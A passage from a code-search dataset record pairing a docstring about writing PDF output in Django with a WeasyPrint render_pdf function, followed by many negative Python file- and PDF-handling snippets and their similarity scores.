self.cache_key:\n self.cache[self.cache_key] = result\n return result" ]
[ "0.7276085", "0.7078293", "0.66783506", "0.6656778", "0.643477", "0.6392354", "0.6384419", "0.6384419", "0.6384419", "0.63783556", "0.63404953", "0.63349915", "0.6328483", "0.62485206", "0.6248228", "0.6211496", "0.62018925", "0.6179627", "0.61627275", "0.6156638", "0.6155268", "0.6056734", "0.60454583", "0.6009426", "0.5991718", "0.5976033", "0.5952032", "0.59428823", "0.5933517", "0.59307516", "0.59301734", "0.587187", "0.5861199", "0.5847007", "0.58421475", "0.58252037", "0.5823716", "0.57639396", "0.5748607", "0.57449836", "0.57390225", "0.5683188", "0.56831586", "0.5681161", "0.56704366", "0.56695557", "0.5664737", "0.56531256", "0.5631833", "0.5613001", "0.560764", "0.5606315", "0.55973494", "0.5593924", "0.558038", "0.556226", "0.55587405", "0.55562234", "0.5554666", "0.5554666", "0.5548668", "0.55479026", "0.5545643", "0.5544774", "0.55391395", "0.55243415", "0.5519566", "0.55152756", "0.55133647", "0.55097526", "0.54862845", "0.54826736", "0.54665285", "0.54590034", "0.5454849", "0.54492897", "0.54403347", "0.5431064", "0.5430604", "0.54301924", "0.5426393", "0.5425549", "0.5419589", "0.54092735", "0.540768", "0.5402924", "0.5394181", "0.5390321", "0.53664386", "0.53657734", "0.53567713", "0.53462094", "0.5344211", "0.53422326", "0.53402716", "0.5337618", "0.5327335", "0.53248364", "0.5323709", "0.532207" ]
0.68511707
2
Writes the PDF data into ``file_``. Note that ``file_`` can actually be a Django Response object as well, since these are filelike objects. This function may be used as a helper that can be used to save a PDF file to a file (or anything else outside of a request/response cycle).
def render_pdf( template: Union[List[str], str], file_: IO, url_fetcher=django_url_fetcher, context: Optional[dict] = None, ): context = context or {} if isinstance(template, str): template = [template] html = select_template(template).render(context) HTML( string=html, base_url="not-used://", url_fetcher=url_fetcher, ).write_pdf( target=file_, )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def save_pdf(self, response):\n\n # get metadata\n file_type = \"__comprovante_de_acesso__\"\n\n # options to save pdf\n file_id = str(uuid.uuid4())\n filename = \"{file_id}.pdf\".format(file_id=file_id)\n file_path = os.path.join(path, \"downloads\", self.scrape_id, filename)\n with open(file_path, 'wb') as f:\n f.write(response.body)\n\n # upload pdf to s3 and call the webhook\n self.upload_file(file_id)\n\n # update values in result\n self.result.update({file_type: {\"file_id\": file_id}})", "def save_pdf(self, response):\n\n if response.status != 200 and self.file_retries > 0:\n self.file_retries -= 1\n yield response.request.replace(dont_filter=True)\n return\n elif response.status != 200:\n return\n else:\n # refresh\n self.file_retries = 3\n\n # get metadata\n file_type = \"__boleto__\"\n invoice_status = response.meta['invoice_status']\n document = response.meta['document']\n\n # options to save pdf\n file_id = str(uuid.uuid4())\n filename = \"{file_id}.pdf\".format(file_id=file_id)\n file_path = os.path.join(path, \"downloads\", self.scrape_id, filename)\n with open(file_path, 'wb') as f:\n f.write(response.body)\n\n # upload pdf to s3 and call the webhook\n self.upload_file(file_id)\n\n # update values in result\n document_value = self.result[document]\n [item.update({\n file_type: {\n \"file_id\": file_id}\n }) for item in document_value[invoice_status]\n if item == response.meta['invoice']]\n self.result.update({document: document_value})", "def response_pdf(self, filename):\n now = DateTime()\n nice_filename = '%s_%s' % (filename, now.strftime('%Y%m%d'))\n self.request.response.setHeader(\"Content-Type\", \"application/pdf\")\n self.request.response.setHeader(\"Content-Disposition\", \"attachment\")\n self.request.response.setHeader(\"filename\", nice_filename)\n self.request.response.setHeader('Last-Modified',\n DateTime.rfc822(DateTime()))\n self.request.response.setHeader(\"Cache-Control\", \"no-store\")\n self.request.response.setHeader(\"Pragma\", \"no-cache\")\n return open(filename, 'rb').read()", "def write(self, fileobj: Union[Path, StrByteType]) -> None:\n if self.output is None:\n raise RuntimeError(ERR_CLOSED_WRITER)\n\n # Add pages to the PdfWriter\n # The commented out line below was replaced with the two lines below it\n # to allow PdfMerger to work with PyPdf 1.13\n for page in self.pages:\n self.output.add_page(page.pagedata)\n pages_obj = cast(Dict[str, Any], self.output._pages.get_object())\n page.out_pagedata = self.output.get_reference(\n pages_obj[PA.KIDS][-1].get_object()\n )\n\n # Once all pages are added, create outline items to point at those pages\n self._write_dests()\n self._write_outline()\n\n # Write the output to the file\n my_file, ret_fileobj = self.output.write(fileobj)\n\n if my_file:\n ret_fileobj.close()", "def render_to_response(self, context, **response_kwargs):\n\n response = HttpResponse(mimetype=self.mimetype)\n response['Content-Disposition'] = ('attachment; filename=%s.%s' %\n (context['filename'],\n self.extension))\n f = render_to_pdf(self.template_name, context)\n response.write(f)\n return response", "def write_pdf_file(output_filename, pdf_writer):\n with open(output_filename, 'wb') as output_file:\n pdf_writer.write(output_file)\n\n # Extra measures to make sure data is written to disk\n output_file.flush()\n os.fsync(output_file.fileno())", "def write_tmp_pdf(self, attachment_file):\n if not attachment_file:\n return None\n outfile, outfilename = tempfile.mkstemp(suffix=\".pdf\")\n outfile = open(outfilename, 'wb')\n 
outfile.write(str(attachment_file.data))\n outfile.close()\n return outfilename", "def write(cls, file, data):\n file.write(data)", "def generate_pdf_file(self, source):\n filename = self.generate_temp_filename()\n if not filename:\n self.errors.append('filename_generation_failed')\n return\n\n try:\n transform_module = getattr(transforms, self.pdf_generator)\n except AttributeError:\n self.errors.append('wrong_generator_configuration')\n return\n\n self.filename = filename\n url = self.context.absolute_url()\n\n print_css = (self.pdf_tool.always_print_css or\n self.context.portal_type in self.pdf_tool.print_css_types)\n\n # When the source is sent through Ajax, it's already encoded\n # as a utf-8 string. When using it without javascript, the\n # source comes from a view, which always returns unicode. In\n # that case we need to encode it.\n if isinstance(source, unicode):\n source = source.encode('utf-8')\n export_file, err = transform_module.html_to_pdf(\n source,\n self.tempdir,\n filename,\n url,\n print_css,\n self.get_extra_options())\n\n if err:\n self.errors.append('pdf_creation_failed')\n return\n\n self.pdf_tool.registerPDF(filename)\n self.pdf_file = export_file\n self.pdf_file.close()", "def _produce_pdf_as_a_response(self, html):\n # Create a Django response object, and specify content_type as pdf\n response = HttpResponse(content_type='application/pdf')\n # Define that this is an attachment. \n response['Content-Disposition'] = 'attachment;'\n pisaStatus = pisa.CreatePDF(html, dest=response)\n \n return response", "def post_drawing_pdf(self, request):\n HttpRequest = request.to_http_info(self.api_client.configuration)\n return self.__make_request(HttpRequest, 'POST', 'file')", "def write_to_file(file: Text, data: bytes):\n with open(file, \"wb\") as w:\n w.write(data)\n w.flush()", "def write_pdf_content(pdf_content, target_dir):\n txt_file = open(target_dir,'w', encoding = 'utf-8')\n txt_file.write(pdf_content)\n txt_file.close()", "def save(self, filepath: Union[str, pathlib.Path]) -> None:\n if isinstance(filepath, str):\n filepath = pathlib.Path(filepath)\n with filepath.open(mode='wb') as file:\n file.write(self.response.content)", "def _save_file(self, file_path, data):\n self._ensure_directory(os.path.dirname(file_path))\n with open(file_path, \"wb\") as f:\n f.write(data)", "def post_drawing_pdf_async(self, request):\n HttpRequest = request.to_http_info(self.api_client.configuration)\n return self.__make_request_async(HttpRequest, 'POST', 'file')", "def get(self, request, document_id, **kwargs):\n document = get_object_or_404(Document, id=document_id)\n with open(document.file.path, 'rb') as f:\n response = HttpResponse(f.read(), content_type='application/pdf')\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' % document.file.name\n return response", "def write(self, file):\n\n rtf = self.getRtf()\n if isinstance(file, str):\n with open(file, \"w\", newline=\"\\n\") as fp:\n fp.write(rtf)\n else:\n file.write(rtf)", "def saveOnFile(self, path, data):\n with open(path, \"w\") as f:\n f.write(data)", "def write(self, object, content_type, to_file):\n return to_file", "def save_text_to_file(self, pdf):\r\n Path(f'{self.text_folder}/{self.pdf_category}').mkdir(parents=True,\r\n exist_ok=True)\r\n with open(self.destination, 'w') as f:\r\n f.write(pdf)", "def write(self, filename, data):\n raise NotImplementedError", "def create_pdf(request):\n\n contact_info = ContactDetails.objects.iterator()\n\n # Create a file-like buffer to receive PDF data.\n buffer = 
io.BytesIO()\n\n # Create the PDF object, using the buffer as its \"file.\"\n pdf_file = canvas.Canvas(buffer)\n\n # Draw things on the PDF. Here's where the PDF generation happens\n pdf_file.setTitle(\"Contact Infomation\")\n pdf_file.setFont(\"Helvetica-Bold\", 20, leading=None)\n pdf_file.setFillColorRGB(1,0,0)\n pdf_file.drawString( 60, 800, \"Stefanos Taramas Contact Information\")\n pdf_file.setFillColorRGB(0,0,0)\n pdf_file.setFont(\"Helvetica\", 15, leading=None)\n\n for index, item in enumerate(contact_info):\n line = str(index + 1) +\") \" + str(item.contact_name) + \": \" + str(item.contact_info)\n column = 50\n row = 750 - 15*index\n pdf_file.drawString(column, row, line)\n\n # Close the PDF object cleanly\n pdf_file.showPage()\n pdf_file.save()\n\n # FileResponse sets the Content-Disposition header so that browsers\n # present the option to save the file.\n buffer.seek(0)\n\n return FileResponse(buffer, as_attachment=True, filename='StefanosTaramasContactInfo.pdf')", "def write_file(self, path, data):\n _url = f\"{self.connector.base_url}/projects/{self.project_id}/files/{path}\"\n\n self.connector.http_call(\"post\", _url, data=data)", "def _create_pdf(self, survey, response):\n pdf_transformer = PDFTransformer(survey, response)\n self._pdf, self._page_count = pdf_transformer.render_pages()\n return self._pdf", "def return_pdf(\n file_name: str,\n settings: config.Settings = Depends(get_settings),\n db: Session = Depends(get_db),\n token: str = Depends(oauth2_scheme),\n):\n logged_user = get_current_user(db, token)\n\n if not logged_user:\n raise HTTPException(403)\n\n if not (logged_user.is_staff or logged_user.is_superuser):\n results = read_results(db, cpf=logged_user.cpf, PDF_Filename=file_name)\n if not results:\n raise HTTPException(404)\n\n result_path = Path(settings.pdf_storage_path).joinpath(file_name)\n\n return FileResponse(str(result_path.absolute()), media_type=\"application/pdf\")", "def toFile(self, file_path) -> None:\n\t\tjson_repr = self.toJSON()\n\t\t\n\t\twith open(file_path, \"w\") as f:\n\t\t\tf.write(json_repr)", "def generate_pdf(file_path_or_url, data_type, filename):\n file_path = get_pdf_file_path(filename)\n if data_type == TYPE_FILE:\n try:\n HTML(filename=file_path_or_url).write_pdf(file_path)\n finally:\n default_storage.delete(file_path_or_url)\n else:\n HTML(file_path_or_url).write_pdf(file_path)\n return filename", "def render_pdf(self, target=None, zoom=1):\n return self._document.write_pdf(target=target, zoom=zoom)", "def vantechy(request):\n return FileResponse(open('/files/presentation.pdf', 'rb'))", "def write(self, data):\n return self._write(self.wfile, data)", "def generate_pdf_flask_response(pdf_data):\n html = HTML(string=pdf_data)\n\n return render_pdf(html)", "def saveFile(self, data, filelocation):\n with open(filelocation, 'w+') as f:\n f.write(data)", "def write_file(self):\n file = open(self.__file_path, 'w+')\n file.truncate(0)\n file.write(self.__content)\n file.close()", "def get_pdf(self) -> io.BytesIO:\n return self._get_pdf(rendered_html=self.get_rendered_html())", "def generate_pdf(pdf_data):\n\n html = HTML(string=pdf_data)\n f = html.write_pdf()\n\n return f", "def write(self, data_to_write):\n self.single_file.write(data_to_write)\n self.single_file.flush()", "def write(self, filename=None):\n # Take filename and expand tilde.\n if filename is not None:\n self.filename = filename\n assert self.filename\n filename = os.path.expanduser(self.filename)\n\n # Write it.\n with codecs.open(filename, 'w', self.encoding) as 
f:\n f.write(self.buffer.text)\n\n self._file_content = self.buffer.text", "def process_output_file_write(output_file, response):\n\n with open(output_file, \"w\") as output_file:\n output_file.write(response)", "def filewrite(self, filename, data):\n try:\n filedata = data.decode(\"utf-8\")\n except Exception:\n filedata = data\n lock = FileLock(filename)\n lock.acquire()\n with open(filename, 'w+') as f:\n f.write(filedata)\n lock.release()", "def save_tmp_file(self, data):\n with open(self.tmp_file, 'wb') as f:\n f.write(data)", "def write_data(tech_id, tech_name, sentence, source, date_crawled):\n with open('PDF_data.txt', 'a') as f:\n # text = match[\"tid\"] + '\\n' + match[\"name\"] + '\\n' + sent + '\\n' + source + '\\n' + date_crawled + '\\n\\n'\n text = tech_id + '\\n' + tech_name + '\\n' + sentence + '\\n' + source + '\\n' + date_crawled + '\\n\\n'\n f.write(text)", "def write_to_file(self, filename: str) -> None:", "def save_response_to_file(self, response, format=None, annotation=''):\n \n if format is None:\n logging.error(\"Specify a format\")\n return None\n\n # Build filename, choosing extension carefully\n url = response.url\n _name, _ext = os.path.splitext(url.split('/')[-1])\n name = remove_reserved_chars(_name)\n if format in ['html', 'pdf']:\n # HTML files might originally have no extension;\n # PDF files may have a non-PDF extension but PDFMiner requires them to have a .pdf extension\n ext = f'.{format}'\n if _ext != '':\n logging.warning(f\"Overwriting file extension from url ({_ext}) with expected extension ({ext}) for {url}\")\n else:\n if _ext == '':\n # Look up extension from dictionary. Note that Google Sheets are assumed to be exported as CSV files.\n ext = todf.get_ext(format)\n logging.warning(\"No extension in original url for {format} data: using expected extension {ext}\")\n else:\n ext = _ext.split('?')[0] # Remove query portion of URL, if any \n file_name = f\"{self.state_abbrev}{annotation}{name}{ext}\"\n\n # Save HTML and CSV as text, other formats as binary\n file_path = os.path.join(TMPDIR, file_name)\n if ext == '.html' or ext == '.csv':\n try:\n with open(file_path, 'w') as f:\n f.write(response.text)\n except UnicodeEncodeError:\n with open(file_path, \"w\", encoding=\"utf-8\") as f:\n f.write(response.text)\n except AttributeError as e:\n logging.error(f\"{e}. 
Check if the format of the content at this URL is html as expected; if not, update the code to specify the correct format (e.g., pdf).\")\n else:\n with open(file_path, 'wb') as f:\n f.write(response.body) \n\n return file_path", "def save(self, file):\n self._save(file.encode())", "def write_to_file(self, file, content):\n with open(file, 'a') as report_file:\n report_file.write('{}\\n'.format(content))", "def download(filename):\n path = os.path.join(\n current_app.root_path, current_app.config['UPLOAD_FOLDER'], filename)\n path_default = current_app.config[\"PDF_TEMPLATE_PATH\"]\n\n def generate():\n try:\n with open(path, \"rb\") as f:\n yield from f\n os.remove(path)\n except FileNotFoundError:\n with open(path_default, \"rb\") as f:\n yield from f\n\n r = current_app.response_class(generate(), mimetype='application/pdf')\n r.headers.set(\n 'Content-Disposition', 'attachment', filename=PDF_OUT_FILENAME\n )\n return r", "def write(self, file):\n #write header\n self.ID.write(file)\n if (self.write_size): \n self.size.write(file)\n for variable in self.variables:\n variable.write(file)\n for subchunk in self.subchunks:\n subchunk.write(file)", "def to_pdf(self, wkhtmltopdf: str, f, output_file: Optional[str] = None):\n if output_file is None:\n output_file = \"-\"\n html = self(f)\n with tempfile.NamedTemporaryFile(\"wb\", suffix=\".html\") as fd:\n html.write(fd)\n fd.flush()\n res = subprocess.run([wkhtmltopdf, fd.name, output_file], stdin=subprocess.DEVNULL, capture_output=True)\n if res.returncode != 0:\n raise RuntimeError(\"%s exited with error %d: stderr: %s\", self.wkhtmltopdf, res.returncode, res.stderr)\n if output_file == \"-\":\n return res.stdout", "def write(self, file_path, content):\n self._set_extension(file_path)\n\n logger.debug(\"writing to %s\", self._file_path)\n\n self._content = content\n\n if self._file_ext == 'json':\n self._write_json()", "def write_to_file(self, papers, filename):\n\t\tpass", "def save_file(self, filename):\r\n \r\n f = open(filename,'w')\r\n f.write(self.body)\r\n f.close", "def save_response(response, file_name, path='~/tmp/fcb-analyzer'):\n \n path = ensure_path(path)\n f = open(path + '/' + file_name, 'w')\n f.write(response.text)", "def write(self, fp, options=None, text=None):\n output = self.render(options, text)\n self.writer.write(output, fp)", "def save(self, file: io.BufferedWriter):\n if self.downloaded:\n json.dump(self.data, file, indent=2)", "def to_output_file(self, content):\n self.__log(f'Starting to write response content to output file.')\n if self.output_file_exists() and not self.config['FORCE_OVERWRITE']:\n self.__log(f'Cannot write to file. Selected output file exists and FORCE_OVERWRITE is disabled.', 'error')\n raise FileExistsError\n file = self.config['OUT_FOLDER'] + '/' + self.config['OUTPUT_FOLDER'] + '/' + self.output_filename + '.' 
\\\n + self.options['image_format'].lower()\n with open(file, 'w') as f:\n f.writelines(content)\n self.__log(f'Successfully wrote response content to \"{file}\".', 'success')", "async def write(self, data, filename):\n logger.debug(\"JSON Page %s\", filename)\n fullpath = os.path.join(self.dirname, filename)\n basedir = os.path.dirname(fullpath)\n if not os.path.exists(basedir):\n os.makedirs(basedir)\n\n with open(fullpath, \"w\") as file_handle:\n file_handle.write(data)", "def write(self, stream):\r\n\r\n stream.write(pystache.render(self._template, self.template_data))", "def to_file(self, slug, folderpath=None, header=None, footer=None):\n if folderpath is None:\n if self.report_path is None:\n self.err(\n \"Please set the report_path parameter or pass a path in arguments\")\n return\n folderpath = self.report_path\n else:\n self.report_path = folderpath\n html = self._get_header(header)\n if html is None or html == \"\":\n self.err(self.to_file, \"Can not get html header\")\n for report in self.reports:\n if \"html\" not in report:\n self.err(\"No html for report \" + report)\n self.reports = self.report_engines = []\n return\n html += report[\"html\"]\n html += self._get_footer(footer)\n try:\n path = self._write_file(slug, folderpath, html)\n path = \"file://\" + path\n except Exception as e:\n self.err(e, self.to_file, \"Can not save report to file\")\n return\n self.reports = []\n self.report_engines = []\n if self.notebook is True:\n link = '<a href=\"' + path + '\" target=\"_blank\">' + path + '</a>'\n return display(HTML(link))", "def __call__(self, method):\n\n that = self\n \n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n html = method(self, *args, **kwargs)\n\n out = cStringIO.StringIO()\n pdf = weasyprint.HTML(string = html).write_pdf(target = out)\n\n response = self.app.response_class()\n response.content_type = \"application/pdf\"\n #response.content_disposition = \"attachment; filename=\\\"...\\\"\"\n response.data = out.getvalue()\n return response\n \n return wrapper", "def _write(self, filename, data):\n fullpath = os.path.join(self._tempdir, filename)\n with open(fullpath, 'w') as ofile:\n json.dump(data, ofile)\n return fullpath", "def save(self, filename):\n result = self.render()\n\n with open(filename, 'w') as f:\n f.write(result)", "def savePDFFile(self):\n s = self.text.get(\"1.0\", tk.END)\n f = open(file, \"w\", encoding='utf-8')\n f.write(s)\n f.close()\n\n # Create a file for each student with their graded files\n pdf = FPDF()\n pdf.add_page()\n pdf.set_font(\"Arial\", size=12)\n pdf.multi_cell(0, 5, s)\n\n # Removed the \\t from the filepath in order to save as pdf in 'Graded' file\n savingFilePDF = re.sub('\\t', '', item_text[0] + \".pdf\")\n pdf.output(gradedFilesFolder + \"\\\\\" + savingFilePDF)\n highlightingTextInFile()", "def write_to(self, fp):\n fp.write(self.text)", "def writeExportFile(self, fileExtension, fileData):\r\n\r\n targetDate = \"%s%s%s\" %(self.reportDate['year'],\r\n self.reportDate['mon'],\r\n self.reportDate['day'])\r\n exportFname = \"%s_%s.%s\" %(self.exportBaseFname, targetDate,\r\n fileExtension)\r\n linkName = \"%s.%s\" %(self.exportBaseFname, fileExtension)\r\n\r\n exportPath = os.path.join(self.exportDir, exportFname)\r\n linkPath = os.path.join(self.exportDir, linkName)\r\n\r\n f = file(exportPath, 'w+')\r\n f.write(fileData)\r\n f.close()\r\n\r\n os.chown(exportPath, 30156, 101)\r\n os.chmod(exportPath, 0664) \r\n\r\n os.remove(linkPath)\r\n os.symlink(exportPath, linkPath)", "def write(self, 
filename, data, hdr):\n pass", "def write_file(self, path, data):\n _url = (\n f\"{self.connector.base_url}/projects/{self.project_id}/nodes/{self.node_id}\"\n f\"/files/{path}\"\n )\n\n self.connector.http_call(\"post\", _url, data=data)", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def pdf_to_text(file_object):\n pdfData = file_object.read()\n tf = tempfile.NamedTemporaryFile()\n tf.write(pdfData)\n tf.seek(0)\n outputTf = tempfile.NamedTemporaryFile()\n\n if len(pdfData) > 0:\n out, err = subprocess.Popen([\"pdftotext\", \"-layout\", tf.name, outputTf.name ]).communicate()\n return outputTf.read()\n else:\n return None", "def write(self, file: IO) -> None:\n serializer = self.serializer_class(self.get_queryset(), many=True)\n\n writer = csv.DictWriter(file, self.serializer_class.Meta.fields)\n writer.writeheader()\n\n # Write serializer data and replace None/'' with 'NA'\n writer.writerows(\n OrderedDict(\n (\n field_name,\n \"NA\" if (field_value is None or field_value == \"\") else field_value,\n )\n for field_name, field_value in row.items()\n )\n for row in serializer.data\n )\n\n file.seek(0)", "def _pdf(self):\n # LOG: processing_type property\n self.set_property('processing_type', 'pdf')\n xmlDoc = PDFiD(self.src_path)\n oPDFiD = cPDFiD(xmlDoc, True)\n # TODO: are there other characteristics which should be dangerous?\n if oPDFiD.encrypt.count > 0:\n self.make_dangerous('encrypted pdf')\n if oPDFiD.js.count > 0 or oPDFiD.javascript.count > 0:\n self.make_dangerous('pdf with javascript')\n if oPDFiD.aa.count > 0 or oPDFiD.openaction.count > 0:\n self.make_dangerous('openaction')\n if oPDFiD.richmedia.count > 0:\n self.make_dangerous('flash')\n if oPDFiD.launch.count > 0:\n self.make_dangerous('launch')", "def save_file(path, file_data):\n file_data.save(path)", "def put_drawing_pdf(self, request):\n HttpRequest = request.to_http_info(self.api_client.configuration)\n return self.__make_request(HttpRequest, 'PUT', 'file')", "def __call__(self, method):\n\n that = self\n \n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n html = method(self, *args, **kwargs)\n pdf = pisa.CreatePDF(html)\n\n response = self.app.response_class()\n response.content_type = \"application/pdf\"\n #response.content_disposition = \"attachment; filename=\\\"...\\\"\"\n response.data = pdf.dest.getvalue()\n return response\n \n return wrapper", "def filewrite(self, filename):\n io.write(self, filename)", "def export_to_file(self, fp, *args, **kwargs):\n with open(fp, 'w') as fh:\n self._to_str(fh)", "def attach_pdf(self, pdf_filename):\n attachment = open(pdf_filename, 'rb')\n part = MIMEApplication(attachment.read(), 'pdf')\n encoders.encode_base64(part)\n # See https://en.wikipedia.org/wiki/MIME#Content-Disposition\n _, filename = os.path.split(pdf_filename)\n part.add_header('Content-Disposition', 'attachment', filename=filename)\n self.attach(part)", "def convert_file_to_pdf(fileobj, outfilename=None,\n cmd_args=settings.WKHTML_DEFAULT_ARGS):\n log.debug(\"fileobj=%s\" % fileobj)\n log.debug(\"wkhtml args=%s\" % cmd_args)\n log.debug(\"outfile=%s\" % outfilename)\n if not outfilename:\n outfile, outfilename = tempfile.mkstemp(suffix='.pdf')\n log.debug(\"temp_pdf_file=%s\" % outfilename)\n os.close(outfile)\n else:\n outdirname = os.path.dirname(outfilename)\n log.debug(\"out_dir=%s\" % outdirname)\n if not os.path.exists(outdirname):\n os.makedirs(outdirname)\n tempfileobj, tempfilename = tempfile.mkstemp(suffix='.html')\n log.debug(\"temp_html_file=%s\" % 
tempfilename)\n tempfileobj = os.fdopen(tempfileobj, 'wb')\n log.debug(\"copying temp html\")\n shutil.copyfileobj(fileobj, tempfileobj)\n tempfileobj.close()\n cmd_args = cmd_args or []\n cmdline = [settings.WKHTML_PATH] + cmd_args + [tempfilename, outfilename]\n process = subprocess.Popen(cmdline,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n log.debug(\"running %s (%s)\" % (' '.join(cmdline),process))\n stdout, stderr = process.communicate()\n os.remove(tempfilename)\n if process.returncode > 0:\n raise ConvertError(stderr)\n return outfilename", "def render(path: str, params: dict):\n template = get_template(path)\n html = template.render(params)\n response = BytesIO()\n # is this file name a placeholder?\n #file = open('my.file.pdf', 'wb')\n pdf = pisa.pisaDocument(BytesIO(html.encode(\"UTF-8\")), response)\n #file.close()\n if not pdf.err:\n return HttpResponse(response.getvalue(), content_type='application/pdf')\n else:\n return HttpResponse(\"Error Rendering PDF\", status=400)", "def put_drawing_pdf_async(self, request):\n HttpRequest = request.to_http_info(self.api_client.configuration)\n return self.__make_request_async(HttpRequest, 'PUT', 'file')", "def stamp(self):\n if not self.__pdf_path:\n raise Exception('The PDF to be timestamped was not set')\n\n if not self.__overwrite_original_file and not self.__output_file_path:\n raise Exception(\"The output destination was not set\")\n\n args = [self.__pdf_path]\n\n # Add timestamp authority.\n if self._timestamp_authority:\n self._timestamp_authority\\\n .add_cmd_arguments(args, self._version_manager)\n\n # This option can only be used on versions greater then 1.5 of the\n # PKI Express.\n self._version_manager.require_version('1.5')\n\n # Logic to overwrite original file or use the output file.\n if self.__overwrite_original_file:\n args.append('--overwrite')\n else:\n args.append(self.__output_file_path)\n\n # This operation can only be used on versions greater than 1.7 of the\n # PKI Express.\n self._version_manager.require_version('1.7')\n\n # Invoke command.\n self._invoke(self.COMMAND_STAMP_PDF, args)", "def save_to_txt(self):\n content = self.get_corpus()\n txt_pdf = open('text_pdf.txt', 'wb')\n txt_pdf.write(content.encode('utf-8'))\n txt_pdf.close()", "def write_object_file_to_file(self, file_name):\n with open(file_name, 'wb+') as file:\n file.write(self.object_file.to_binary_array())", "def _save(self, data: PIL.Image) -> None:\n with self._fs.open(self._filepath, mode=\"wb\") as f:\n data.save(f)", "def pdfReceiver(request, model=''):\n\n\tinput_str = ''\n\tinput_str += parsePOST(request)\n\t# packet = io.StringIO() # write to memory\n\tpacket = io.BytesIO()\n\n\ttry:\n\t\tpisa.CreatePDF(input_str, dest=packet)\n\texcept ValueError as error:\n\t\t# triggered from the elusive invalid color value issue:\n\t\tlogging.warning(\"elusive invalid color value, defaulting html background-color to FFFFFF\")\n\t\tpisa.CreatePDF(input_str, dest=packet, default_css=\"body{background-color:#FFFFFF;}\")\n\n\n\tjid = MetabolizerCalc().gen_jid() # create timestamp\n\tresponse = HttpResponse(packet.getvalue(), content_type='application/pdf')\n\tresponse['Content-Disposition'] = 'attachment; filename=' + model + '_' + jid + '.pdf'\n\tpacket.close() # todo: figure out why this doesn't solve the 'caching problem'\n\treturn response", "def printPdfPersonalData(self, fileName, fileType, outFile):\n self.filesList.doBackup(fileName)\n self.filesList.cleanPdataMarks(fileName)\n\n if fileType != 'Pdf':\n outFile = 
AddedFile.changeExt(outFile, \"pdf\")\n #try:\n \n printer = QtGui.QPrinter() \n printer.setPageSize(QtGui.QPrinter.Letter)\n printer.setResolution(96)\n print \"Page size \", str(self.filesList.getPdataDocSize(fileName).height())\n printer.setPaperSize(QtCore.QSizeF(self.filesList.getPdataDocSize(fileName)), QtGui.QPrinter.Point)\n printer.setOutputFormat(QtGui.QPrinter.PdfFormat)\n printer.setOutputFileName(outFile)\n printer.setFullPage(True)\n self.personalDataList.document().print_(printer)\n self.writeDetails(\"Writing PDF to \" + outFile)\n self.filesList.loadBackup(fileName)\n\n #Finally clean the new pdf\n self.cleanPrintedPdf(outFile);\n\n # self.filesList.refreshPdata(fileName)\n #except Exception:\n # self.writeDetails(\"Failed to write to \" + fileName)", "def file_as_pdf(self, file_as_pdf):\n if file_as_pdf is not None and len(file_as_pdf) < 1:\n raise ValueError(\"Invalid value for `file_as_pdf`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._file_as_pdf = file_as_pdf", "def report_download(self, data, token):\n requestcontent = json.loads(data)\n url, type = requestcontent[0], requestcontent[1]\n # raise UserError(type)\n if type in [\"qweb-docx\"]:\n # raise UserError(type)\n converter = \"docx\" # if type == 'qweb-pdf' else 'text'\n extension = \"docx\" # if type == 'qweb-pdf' else 'txt'\n pattern = (\n \"/report/docx/\" # if type == 'qweb-pdf' else '/report/text/'\n )\n reportname = url.split(pattern)[1].split(\"?\")[0]\n\n docids = None\n if \"/\" in reportname:\n reportname, docids = reportname.split(\"/\")\n\n if docids:\n # Generic report:\n response = self.report_routes(\n reportname, docids=docids, converter=converter\n )\n else:\n # Particular report:\n data_my = url_decode(\n url.split(\"?\")[1]\n ).items() # decoding the args represented in JSON\n response = self.report_routes(\n reportname, converter=converter, **dict(data_my)\n )\n\n report = request.env[\"ir.actions.report\"]._get_report_from_name(\n reportname\n )\n filename = \"%s.%s\" % (report.name, extension)\n\n if docids:\n ids = [int(x) for x in docids.split(\",\")]\n obj = request.env[report.model].browse(ids)\n if report.print_report_name and not len(obj) > 1:\n report_name = safe_eval(\n report.print_report_name, {\"object\": obj, \"time\": time}\n )\n filename = \"%s.%s\" % (report_name, extension)\n response.headers.add(\n \"Content-Disposition\", content_disposition(filename)\n )\n response.set_cookie(\"fileToken\", token)\n return response\n res = super().report_download(data, token)\n return res", "def save(self, file):\n pkgng_pkg = pptx.packaging.Package().marshal(self)\n pkgng_pkg.save(file)", "def save_data_to_file(file_data, file_path):\r\n# Open file and write in it the updated file_name(with actual_result).\r\n\twith open(file_path, 'a') as fp:\r\n\t\tfp.write('{}\\n'.format(json.dumps(file_data)))", "def pipe_to_file(response, path):\n # TODO: Indicate progress.\n with open(path, 'wb') as file:\n while True:\n chunk = response.read(4096)\n if not chunk:\n break\n file.write(chunk)", "def write_file(data, file_path):\n try:\n with open(file_path, \"w\") as file_obj:\n file_obj.write(data)\n\n except OSError:\n writer(f\"\\nwarning: Unable to write backup file {file_path}\\n\", FORMAT[\"WARNING\"])", "def pdf(self, identifier):\n return self.client.request_with_method(Methods.PDF % (self.name, identifier,))", "def output_attachment(self, path, content):\n\t\twith open(path, \"w+b\") as fd:\n\t\t\tfd.write(content)", "def write(self, filename, data):\n\t\t# create 
the path if it doesn't exists\n\t\tdir = os.path.dirname(filename)\n\t\tif not os.path.isdir(dir):\n\t\t\tos.mkdir(dir)\n\t\t\n\t\t# write data\n\t\tfile = codecs.open(filename, 'w', 'utf8')\n\t\tfile.write(data)\n\t\tfile.close()", "def _write(self, data):\n self._writer.write(data)", "async def write_file(self, directory: str, name: str, file: bytes):\n pass", "def render_file(self, context, result):\n\t\tif __debug__:\n\t\t\tlog.debug(\"Processing file-like object.\", extra=dict(request=id(context), result=repr(result)))\n\t\t\n\t\tresponse = context.response\n\t\tresponse.conditional_response = True\n\t\t\n\t\tmodified = mktime(gmtime(getmtime(result.name)))\n\t\t\n\t\tresponse.last_modified = datetime.fromtimestamp(modified)\n\t\tct, ce = guess_type(result.name)\n\t\tif not ct: ct = 'application/octet-stream'\n\t\tresponse.content_type, response.content_encoding = ct, ce\n\t\tresponse.etag = unicode(modified)\n\t\t\n\t\tresult.seek(0, 2) # Seek to the end of the file.\n\t\tresponse.content_length = 